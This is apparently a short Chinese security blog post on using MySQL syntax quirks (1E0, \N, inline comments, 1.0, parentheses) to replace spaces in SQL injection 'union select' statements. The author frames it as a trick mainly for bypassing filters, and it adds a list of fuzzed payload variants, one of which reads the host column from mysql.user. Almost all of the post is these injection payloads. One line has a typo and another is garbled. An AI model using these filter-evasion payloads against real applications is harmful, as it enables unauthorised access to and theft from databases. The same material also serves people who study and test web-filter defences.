还是用来bypass的方向居多,算是个小技巧吧

select * from table where id=1E0union selsect 1,2,3
select * from table where id=\Nunion select 1,2,3
select * from table where id=1/**/union select 1,2,3
select(count(*))from(users)
select * from table where id=1.0union select 1,2,3

同类Fuzz拓展:

where id=.1union/*.1*/select-.1
where id=.1union/*.1*/select!.1
where id=.1union/*.1*/select~.1
where id=.1union/*.1*/select(1)
where id=.1union/*.1*/select`host`from mysql.user
where id=.1union/*.1*/select'1'
where id=.1union/*.1*/select"1"
where id=.1union/*.1*/[email protected]





本文链接地址: Mysql利用特性代替空格拼接语句

原创文章,转载请注明: 转载自Lz1y's Blog

发表评论

电子邮件地址不会被公开。 必填项已用*标注